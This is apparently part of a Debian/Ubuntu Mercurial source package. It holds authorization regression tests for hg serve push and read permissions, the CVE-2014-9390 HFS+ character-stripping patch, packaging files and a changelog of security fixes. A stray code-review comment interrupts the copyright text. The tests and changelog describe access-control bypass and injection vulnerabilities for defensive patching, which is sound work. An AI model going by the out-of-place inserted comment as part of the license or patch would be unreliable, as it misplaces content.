$DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + [1] + + $ hg book -d bm + + $ hg --cwd 
../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + remote: adding changesets + remote: adding manifests + remote: adding file changes + remote: added 1 changesets with 1 changes to 1 files + + $ hg strip -r 1: + saved backup bundle to $TESTTMP/test/.hg/strip-backup/ba677d0156c1-backup.hg + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_push=* allows pushes from authenticated users + + $ REMOTE_USER=someuser REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 200 Script output follows + + 1 + + $ hg bookmarks + bm 0:cb9a9f314b8b + $ hg book -d bm + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 200 Script output follows + + write command no defined permissions + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 200 Script output follows + + write command w/ defined permissions + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ REMOTE_USER=someuser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + [1] + + $ hg book -d bm + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + remote: adding changesets + remote: adding manifests + remote: adding file changes + remote: added 1 changesets with 1 changes to 1 files + + $ hg strip -r 1: + saved backup bundle to $TESTTMP/test/.hg/strip-backup/ba677d0156c1-backup.hg + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_push= denies push to user not in list + + $ cat > 
.hg/hgrc < [web] + > push_ssl = false + > allow_push = gooduser + > EOF + + $ REMOTE_USER=baduser REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ hg bookmarks + no bookmarks set + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 push not authorized + + 0 + push not authorized + [1] + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ REMOTE_USER=baduser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + abort: authorization failed + [255] + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_push= allows push from user in list + + $ REMOTE_USER=gooduser REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 200 Script output follows + + 1 + + $ hg 
bookmarks + bm 0:cb9a9f314b8b + $ hg book -d bm + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 200 Script output follows + + 1 + + $ hg bookmarks + bm 0:cb9a9f314b8b + $ hg book -d bm + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 200 Script output follows + + write command no defined permissions + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 200 Script output follows + + write command w/ defined permissions + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ REMOTE_USER=gooduser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + [1] + + $ hg book -d bm + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + remote: adding changesets + remote: adding manifests + remote: adding file changes + remote: added 1 changesets with 1 changes to 1 files + + $ hg strip -r 1: + saved backup bundle to $TESTTMP/test/.hg/strip-backup/ba677d0156c1-backup.hg + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_push takes precedence over web.allow_push + + $ cat > .hg/hgrc < [web] + > push_ssl = false + > allow_push = someuser + > deny_push = someuser + > EOF + + $ REMOTE_USER=someuser REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" 
$LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ hg bookmarks + no bookmarks set + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 push not authorized + + 0 + push not authorized + [1] + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ REMOTE_USER=someuser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + abort: authorization failed + [255] + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_push has no effect if web.deny_read is set + + $ cat > .hg/hgrc < [web] + > push_ssl = false + > allow_push = * + > deny_read = * + > EOF + + $ REQUEST_METHOD=POST REMOTE_USER=someuser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 read not authorized + + 0 + read not authorized + [1] + + $ hg bookmarks + no bookmarks set + + $ "$TESTDIR/get-with-headers.py" 
$LOCALIP:$HGPORT '?cmd=customreadnoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 read not authorized + + 0 + read not authorized + [1] + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ REMOTE_USER=someuser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + abort: authorization failed + [255] --- a/tests/test-pull-http.t +++ b/tests/test-pull-http.t @@ -37,7 +37,6 @@ expect error, cloning not allowed $ hg serve -p $HGPORT -d --pid-file=hg.pid -E errors.log $ cat hg.pid >> $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ test4 - requesting all changes abort: authorization failed [255] $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS @@ -57,7 +56,6 @@ serve errors expect error, pulling not allowed $ req - pulling from http://localhost:$HGPORT/ abort: authorization failed % serve errors --- a/tests/test-push-http.t +++ b/tests/test-push-http.t 
@@ -139,27 +139,3 @@ expect phase change success [1] $ hg rollback repository tip rolled back to revision 0 (undo serve) - -expect authorization error: all users denied - - $ echo '[web]' > .hg/hgrc - $ echo 'push_ssl = false' >> .hg/hgrc - $ echo 'deny_push = *' >> .hg/hgrc - $ req - pushing to http://localhost:$HGPORT/ - searching for changes - abort: authorization failed - % serve errors - [255] - -expect authorization error: some users denied, users must be authenticated - - $ echo 'deny_push = unperson' >> .hg/hgrc - $ req - pushing to http://localhost:$HGPORT/ - searching for changes - abort: authorization failed - % serve errors - [255] - - $ cd .. debian/patches/CVE-2014-9390.pt10000664000000000000000000000331112445112145012645 0ustar # HG changeset patch # User Augie Fackler # Date 1418753201 18000 # Node ID 885bd7c5c7e3efc10081c09c11e538a3fa19ace4 # Parent 035434b407be60e5ae7a0da56f9d7a187a6bef5a encoding: add hfsignoreclean to clean out HFS-ignored characters According to Apple Technote 1150 (unavailable from Apple as far as I can tell, but archived in several places online), HFS+ ignores sixteen specific unicode runes when doing path normalization. We need to handle those cases, so this function lets us efficiently strip the offending characters from a UTF-8 encoded string (which is the only way it seems to matter on OS X.) diff -r 035434b407be -r 885bd7c5c7e3 mercurial/encoding.py --- a/mercurial/encoding.py Thu Dec 11 15:42:49 2014 -0500 +++ b/mercurial/encoding.py Tue Dec 16 13:06:41 2014 -0500 
@@ -8,6 +8,28 @@ import error import unicodedata, locale, os +# These unicode characters are ignored by HFS+ (Apple Technote 1150, +# "Unicode Subtleties"), so we need to ignore them in some places for +# sanity. +_ignore = [unichr(int(x, 16)).encode("utf-8") for x in + "200c 200d 200e 200f 202a 202b 202c 202d 202e " + "206a 206b 206c 206d 206e 206f feff".split()] +# verify the next function will work +assert set([i[0] for i in _ignore]) == set(["\xe2", "\xef"]) + +def hfsignoreclean(s): + """Remove codepoints ignored by HFS+ from s. + + >>> hfsignoreclean(u'.h\u200cg'.encode('utf-8')) + '.hg' + >>> hfsignoreclean(u'.h\ufeffg'.encode('utf-8')) + '.hg' + """ + if "\xe2" in s or "\xef" in s: + for c in _ignore: + s = s.replace(c, '') + return s + def _getpreferredencoding(): ''' On darwin, getpreferredencoding ignores the locale environment and debian/copyright0000664000000000000000000000266512201757705011142 0ustar Format: http://anonscm.debian.org/viewvc/dep/web/deps/dep5.mdwn?revision=174 Upstream-Name: mercurial Upstream-Source: http://www.selenic.com/mercurial/ Files: * Copyright: Copyright 2005 Matt Mackall and others. License: GPL-2+ You can redistribute this software and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; version 2 or any later version. . This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. . On Debian systems, the complete text of the GNU General Public License can be found in /usr/share/common-licenses/GPL-2 file. Files: debian/* Copyright: Copyright 2005-2010, Vincent Danjean License: GPL-2+ You can redistribute this software and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; version 2 or any later version. . 
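Review bot: The docstring of `hfsignoreclean` never states that `s` must be a UTF-8 encoded byte string, yet `_ignore` holds UTF-8 byte sequences and the fast path tests only for the lead bytes `\xe2` and `\xef`. A path still in another local encoding would presumably not be cleaned correctly, so I would add a docstring line such as `s must be a UTF-8 encoded byte string; convert from the local encoding before calling.` The two doctests cover only 200c and feff out of the sixteen entries; a test that loops over `_ignore` and checks `hfsignoreclean('.h' + c + 'g') == '.hg'` would pin the whole table. The module-level `assert` is skipped under `python -O`, so a short comment marking it as a developer sanity check for the fast path, not a runtime guard, would help.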
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. . On Debian systems, the complete text of the GNU General Public License can be found in /usr/share/common-licenses/GPL-2 file. debian/mercurial.install0000664000000000000000000000017312231000135012527 0ustar debian/tmp/usr/bin debian/tmp/usr/lib debian/hgext.rc usr/share/mercurial/ debian/hgext.rc.md5sums usr/share/mercurial/ debian/mercurial-common.manpages0000664000000000000000000000006312201757705014163 0ustar doc/hg.1 doc/hgrc.5 doc/hgignore.5 debian/hg-ssh.8 debian/hg-ssh.80000664000000000000000000000154612201757705010466 0ustar .TH HG-SSH 8 2008-01-03 .SH NAME hg-ssh \- restricted ssh login shell for Mercurial .SH SYNOPSIS .B hg-ssh .IR repositories ... .SH DESCRIPTION .B hg-ssh can be used as a restricted shell where access to Mercurial repositories is given over .BR ssh (1). It should be specified, together with the paths to the .I repositories the user should be given access to, as a .I command option in an .BR authorized_keys (5) file. .PP An example .I authorized_keys line using .BR hg-ssh : .RS command="hg-ssh path/to/repo1 /path/to/repo2 ~/repo3 ~user/repo4" ssh-rsa AA...== .RE .PP The user with the specified key would then be permitted to push and pull to the repositories using the URLs: .RS .nf ssh://example.com/path/to/repo1 ssh://example.com//path/to/repo2 ssh://example.com/~/repo3 ssh://example.com/~user/repo4 .fi .RE .PP The .I command option only fixes which program the key may run; add the .BR sshd (8) key options no-pty, no-port-forwarding, no-X11-forwarding and no-agent-forwarding to the same .I authorized_keys line so that the key cannot also be used for a terminal or for port, X11 or agent forwarding. .SH SEE ALSO .BR sshd (8), .BR ssh (1), .BR hg (1).
debian/source/0000775000000000000000000000000012261312155010466 5ustar debian/source/include-binaries0000664000000000000000000000004012261310077013621 0ustar debian/upstream-signing-key.pgp debian/source/format0000664000000000000000000000001412201757715011705 0ustar 3.0 (quilt) debian/changelog0000664000000000000000000022576313375564060011072 0ustar mercurial (2.8.2-1ubuntu1.4) trusty-security; urgency=medium * SECURITY UPDATE: Remote attackers can execute arbitrary code via a crafted git ext:: URL when cloning a subrepository. - debian/patches/CVE-2016-3068.patch: set GIT_ALLOW_PROTOCOL to limit git clone protocols. - CVE-2016-3068 * SECURITY UPDATE: Remote attackers can execute arbitrary code via a crafted name when converting a Git repository. - debian/patches/CVE-2016-3069_part1.patch: add new, non-clowny interface for shelling out to git. - debian/patches/CVE-2016-3069_part2.patch: rewrite calls to Git to use the new shelling mechanism. - debian/patches/CVE-2016-3069_part3.patch: dead code removal - old git calling functions - debian/patches/CVE-2016-3069_part4.patch: test for shell injection in git calls - CVE-2016-3069 * SECURITY UPDATE: The convert extension might allow attackers to execute arbitrary code via a crafted git repository name. - debian/patches/CVE-2016-3105.patch: Pass absolute paths to git. - CVE-2016-3105 * SECURITY UPDATE: Remote attackers can execute arbitrary code via a clone, push or pull command because of a list sizing rounding error and short records. - debian/patches/CVE-2016-3630_part1.patch: fix list sizing rounding error. - debian/patches/CVE-2016-3630_part2.patch: detect short records - CVE-2016-3630 * SECURITY UPDATE: hg server --stdio allows remote authenticated users to launch the Python debugger and execute arbitrary code. - debian/patches/CVE-2017-9462.patch: Protect against malicious hg serve --stdio invocations. 
- CVE-2017-9462 * SECURITY UPDATE: A specially malformed repository can cause GIT subrepositories to run arbitrary code. - debian/patches/CVE-2017-17458_part1.patch: add test-audit-subrepo.t testcase. - debian/patches/CVE-2017-17458_part2.patch: disallow symlink traversal across subrepo mount point. - CVE-2017-17458 * SECURITY UPDATE: Missing symlink check could be abused to write to files outside the repository. - debian/patches/CVE-2017-1000115.patch: Fix symlink traversal. - CVE-2017-1000115 * SECURITY UPDATE: Possible shell-injection attack from not adequately sanitizing hostnames passed to ssh. - debian/patches/CVE-2017-1000116.patch: Sanitize hostnames passed to ssh. - CVE-2017-1000116 * SECURITY UPDATE: Integer underflow and overflow. - debian/patches/CVE-2018-13347.patch: Protect against underflow. - debian/patches/CVE-2018-13347-extras.patch: Protect against overflow. - CVE-2018-13347 * SECURITY UPDATE: Able to start fragment past of the end of original data. - debian/patches/CVE-2018-13346.patch: Ensure fragment start is not past then end of orig. - CVE-2018-13346 * SECURITY UPDATE: Data mishandling in certain situations. - debian/patches/CVE-2018-13348.patch: Be more careful about parsing binary patch data. - CVE-2018-13348 * SECURITY UPDATE: Vulnerability in Protocol server can result in unauthorized data access. - debian/patches/CVE-2018-1000132.patch: Always perform permissions checks on protocol commands. 
- CVE-2018-1000132 -- Eduardo Barretto Fri, 16 Nov 2018 16:16:59 -0200 mercurial (2.8.2-1ubuntu1.3) trusty-security; urgency=medium [ Jamie Strandboge ] * SECURITY UPDATE: fix for improperly handling case-insensitive paths on Windows and OS X clients - http://selenic.com/repo/hg-stable/rev/885bd7c5c7e3 - http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e - http://selenic.com/repo/hg-stable/rev/6dad422ecc5a - CVE-2014-9390 - LP: #1404035 [ Marc Deslauriers ] * SECURITY UPDATE: arbitrary command exection via crafted repository name in a clone command - d/p/from_upstream__sshpeer_more_thorough_shell_quoting.patch: add more thorough shell quoting to mercurial/sshpeer.py. - CVE-2014-9462 * debian/patches/fix_ftbfs_patchbomb_test.patch: fix patchbomb test. -- Marc Deslauriers Wed, 17 Jun 2015 10:51:42 -0400 mercurial (2.8.2-1ubuntu1) trusty; urgency=medium * debian/tests/control: - Add "allow-stderr" restriction to "testsuite" as it prints out a "Tested with unexpected mercurial lib:" warning. - Disable hgsubversion test as it needs access to anonscm.debian.org which we don't have in Ubuntu CI. -- Martin Pitt Thu, 16 Jan 2014 17:25:51 +0100 mercurial (2.8.2-1) unstable; urgency=medium * New upstream release * Drop for_upstream__fix_i18n.patch as it's now included upstream * Make uscan verify the signature of downloaded tarballs -- Javi Merino Thu, 02 Jan 2014 17:31:05 +0100 mercurial (2.8.1-2) unstable; urgency=low * Pass -f to rm so that repeated builds succeed (Closes: #731623). * Fix installation in the case where there is more than one supported version of Python (Closes: #729153). - Thanks to Faheem Mitha for the patch. * Make test-shelve.t more lenient. This should hopefully fix the semi-intermittent build failures on some architectures with slower buildds. -- Tristan Seligmann Sun, 08 Dec 2013 02:03:54 +0200 mercurial (2.8.1-1) unstable; urgency=low * New upstream release (Closes: #731471) * Add myself to Uploaders. * Add patch to fix test-i18n. 
* Remove pyflakes test to avoid build failures when pyflakes is installed. -- Tristan Seligmann Fri, 06 Dec 2013 01:14:40 +0200 mercurial (2.8-3) unstable; urgency=low * Fix mercurial-git autopkg test * Add missing deps to run the testsuite with autopkgtest * Increment testsuite timeout to 1440 to prevent timeouts in mips * Move wish to Recommends as it's needed for hg view -- Javi Merino Sun, 17 Nov 2013 10:13:23 +0000 mercurial (2.8-2) unstable; urgency=medium * Increment testsuite timeout to 720 as test-gendoc.t takes a loooong time on armel * Don't run pyflakes on the autopkgtest for the testsuite, it fails to see the pyflakes error it's expecting (but it's not our job to fix python lint issues) -- Javi Merino Fri, 15 Nov 2013 14:10:00 +0000 mercurial (2.8-1) unstable; urgency=low * New upstream release * Fix mercurial-git and hgsubversion autopkgtest by loading the appropriate extension * Bump standards-version to 3.9.5 (no change needed) -- Javi Merino Fri, 01 Nov 2013 23:19:57 +0000 mercurial (2.8~rc1-1) experimental; urgency=low * New upstream release * Fix patches deb_specific__install-help-separately, deb_specific__install-help-separately and deb_specific__install-mo-fhs.patch so that we can run the full testsuite when building * Build-depend on netbase to make test-serve.t work -- Javi Merino Mon, 21 Oct 2013 22:35:36 +0100 mercurial (2.7.2-1) unstable; urgency=low * New upstream release * Revert breaks of mercurial-git back to << 0.4.0-1 (Closes: #725145) * Re-enable the testsuite as the tests that timeout can be blacklisted -- Javi Merino Wed, 02 Oct 2013 23:55:58 +0100 mercurial (2.7.1-3) unstable; urgency=low * Update breaks of mercurial-git to the current version (0.4.0-1) * Add autopkgtest tests -- Javi Merino Tue, 01 Oct 2013 08:48:23 +0100 mercurial (2.7.1-2) unstable; urgency=low * Temporarily don't run the testsuite when building. Since 2.7.1 it timeouts in buildd environments (but works ok if run in the command line). 
-- Javi Merino Thu, 05 Sep 2013 21:52:14 +0100 mercurial (2.7.1-1) unstable; urgency=low * New upstream release * Enable tests that need networking -- Javi Merino Wed, 04 Sep 2013 23:06:57 +0100 mercurial (2.7-2) unstable; urgency=low * Fix "conffiles not removed" by properly moving them to mercurial-common (Closes: #718621) -- Javi Merino Tue, 13 Aug 2013 23:11:14 +0200 mercurial (2.7-1) unstable; urgency=low * New upstream release * Remove shrink-revlog.py from examples as it is no longer shipped in mercurial -- Javi Merino Sun, 11 Aug 2013 16:09:20 +0200 mercurial (2.6.3-1) unstable; urgency=low * New upstream release * Remove preinst script as it's mostly checks for stuff that was fixed long ago * Remove old checks from postinst * Move config files to mercurial-common * Install bash-completion using debhelper's bash-completion sequencer * Compatible with hgsubversion 1.5 or greater, update breaks to reflect that -- Javi Merino Sun, 21 Jul 2013 23:31:34 +0200 mercurial (2.6.2-1) unstable; urgency=low * New upstream release * Delete patch from_upstream__fix_untranslated_prompts_with_translated_responses.patch which is now included upstream -- Javi Merino Sun, 09 Jun 2013 10:36:59 +0100 mercurial (2.6.1-1) unstable; urgency=low [ Jakub Wilk ] * Use canonical URIs for Vcs-* fields. [ Javi Merino ] * New upstream release (Closes: #709815) * Blacklist test-histedit-arguments.t and test-websub.t * Fix "Translation missing for yes/no question, but requires translated input from user" by adding patch from_upstream__fix_untranslated_prompts_with_translated_responses.patch (Closes: #707703) * Upload to unstable -- Javi Merino Wed, 15 May 2013 22:16:29 +0100 mercurial (2.5.2-1) experimental; urgency=low * New upstream release * Update hgview breaks. hgview works with mercurial 2.5 starting from 1.7.1-1. 
* test-convert-git.t works again so add it back to the test-suite we run when building the package -- Javi Merino Tue, 19 Mar 2013 22:53:20 +0000 mercurial (2.5.1-1) experimental; urgency=low * New upstream release * Add test-obsolete.t to the blacklisted tests * hgview 1.5.0-4 doesn't work with mercurial 2.5.1 -- Javi Merino Tue, 12 Feb 2013 21:13:06 +0000 mercurial (2.4.2-1) experimental; urgency=low * New upstream release -- Javi Merino Wed, 02 Jan 2013 13:01:27 +0100 mercurial (2.4.1-1) experimental; urgency=low * New upstream release -- Javi Merino Wed, 19 Dec 2012 21:10:25 +0000 mercurial (2.4-1) experimental; urgency=low * New upstream release * mercurial 2.3.1 was not compatible with hgsubversion 1.4 and mercurial-git 0.3.3 * Bump standards-version to 3.9.4 (no change needed) * Add test-commit-amend to the blacklisted tests as it needs styles now -- Javi Merino Tue, 27 Nov 2012 22:35:33 +0000 mercurial (2.3.1-1) experimental; urgency=low * New upstream release * Delete patch for_upstream__hgweb_fix_spelling_error.patch which is now included upstream -- Javi Merino Sun, 16 Sep 2012 16:05:55 +0100 mercurial (2.3-2) experimental; urgency=low * Blacklist test-histedit-revspec as it needs styles -- Javi Merino Sat, 04 Aug 2012 20:56:38 +0200 mercurial (2.3-1) experimental; urgency=low * Don't run the testsuite if nocheck is in DEB_BUILD_OPTIONS * Move to dh v9 to automatically get the Hardening buildflags * Don't Suggest xxdiff, as it's been removed from the archive * New upstream release * Add patch for_upstream__hgweb_fix_spelling_error.patch to fix a spelling error in a manpage -- Javi Merino Fri, 03 Aug 2012 20:53:44 +0200 mercurial (2.2.2-1) unstable; urgency=low * New upstream release -- Javi Merino Sun, 03 Jun 2012 09:17:36 +0100 mercurial (2.2.1-2) unstable; urgency=low * Blacklist test-convert-git.t as it is known to fail with git 1.7.10 and it's making it fail to build in armel. 
* Build-depend on python-roman (Closes: #671611) -- Javi Merino Sun, 06 May 2012 17:31:51 +0100 mercurial (2.2.1-1) unstable; urgency=low * New upstream release that fixes a memory leak in hgweb * Refresh i18n/{de,da,ja}.po translations in deb_specific__use_sensible-editor.patch -- Javi Merino Fri, 04 May 2012 21:57:42 +0100 mercurial (2.2-2) unstable; urgency=low * Don't patch test-pull-pull-corruption2.t in kfreebsd-i386, armel, sparc or mips, it's now integrated into test-pull-pull-corruption.t -- Javi Merino Wed, 02 May 2012 19:21:40 +0100 mercurial (2.2-1) unstable; urgency=low * New upstream release 2.2 * Delete patches for_upstream__skip_test_gpg_if_not_mercurial_wd.patch and from_upstream__tests_re_silence_test_bad_pull_log_messages.patch which are now included upstream * Refresh patches -- Javi Merino Wed, 02 May 2012 08:08:32 +0100 mercurial (2.1.2-2) unstable; urgency=low * Add sparc to the list of architectures with slow buildds * Import 91eec29dd7de from upstream to fix the test-suite failures in mips and sparc -- Javi Merino Tue, 03 Apr 2012 21:54:05 +0100 mercurial (2.1.2-1) unstable; urgency=low * New upstream release 2.1.2 * Add armel to the list of architectures with slow buildds * Drop patch "deb_specific__no_optim_bdiff_armel.patch" as gcc no longer miscompiles bdiff in armel * Remove confusing entry in Debian.NEWS (Closes: #666549) * Remove patches for_upstream__fix_kfreebsd_test_inherit.patch, from_upstream__dont_translate_the_abort_message_twice.patch and from_upstream__fix_all_remaining_uses_of_inside.patch which are now included upstream * Add patch for_upstream__skip_test_gpg_if_not_mercurial_wd.patch to skip test-gpg when the testsuite is not run in a hg checkout -- Javi Merino Mon, 02 Apr 2012 22:50:29 +0100 mercurial (2.1.1-2) unstable; urgency=low * Add kfreebsd-i386 to the list of slow architectures for the test suite. 
* Improve the fix for the test-inherit-mode.t patch based on suggestions from upstream * Fix "UnicodeDecodeError when refusing to update" by adding patches from_upstream__dont_translate_the_abort_message_twice.patch and from_upstream__fix_all_remaining_uses_of_inside.patch (Closes: #662207) -- Javi Merino Fri, 09 Mar 2012 00:14:13 +0000 mercurial (2.1.1-1) unstable; urgency=low * New upstream version 2.1.1-1 * Change the group of the test dir in test-inherit-mode.t so that the testsuite doesn't fail in kfreebsd-* * Drop from_upstream__test_check_code_hg_skip_test_if_not_wd.patch which is now included upstream * Upload to unstable -- Javi Merino Sat, 03 Mar 2012 08:03:18 +0000 mercurial (2.1-3) experimental; urgency=low * Remove unused lintian override binary-without-manpage * Bump standards-version to 3.9.3 (no change needed) * Suggest tkcvs instead of tkdiff. tkdiff has been removed from wheezy as tkcvs provides tkdiff (see bug #483362). * Suggest more visual diff commands * Increment test timeout. test-bisect2.t timed out on mips. 
* Increment the sleeps in the testsuite in mips so that the test produces the same output as in faster architectures * Ignore the output of chmod in a test so that the testsuite doesn't fail in kfreebsd-* * Add patch from_upstream__test_check_code_hg_skip_test_if_not_wd.patch to skip test_check_code_hg instead of having to blacklist it -- Javi Merino Wed, 29 Feb 2012 08:51:26 +0000 mercurial (2.1-2) experimental; urgency=low * Recommend ssh * Bump watch version to 3 since we are using version mangling * Run tests in the buildds * Added my new DD account -- Javi Merino Sat, 25 Feb 2012 18:12:14 +0000 mercurial (2.1-1) unstable; urgency=low * New upstream revision -- Javi Merino Fri, 03 Feb 2012 18:38:19 +0100 mercurial (2.0.2-1) unstable; urgency=low * New upstream revision * Fix "hg-ssh is installed system-wide but uses "/usr/bin/env python" as the python interpreter" with a patch that fixes the interpreter (Closes: #654925) -- Javi Merino Fri, 06 Jan 2012 22:09:32 +0000 mercurial (2.0.1-2) unstable; urgency=low * Team Upload * Update Breaks for hgsubversion (see bug #646946), hg-git (see bug #645037), hgview (see bug #637400), and qct (see bug #637401). -- Jakub Wilk Sun, 11 Dec 2011 23:47:26 +0100 mercurial (2.0.1-1) unstable; urgency=low * New upstream revision (Closes: #650727). * Fix "new -rc release are not properly parsed by watch" with a patch from Pierre-Yves David (Closes: #650728) -- Javi Merino Fri, 02 Dec 2011 21:35:31 +0000 mercurial (2.0-2) unstable; urgency=low * Fix "Cloning fails with: mpatch.mpatchError: patch cannot be decoded" by not compiling bdiff.c with optimizations in armel.
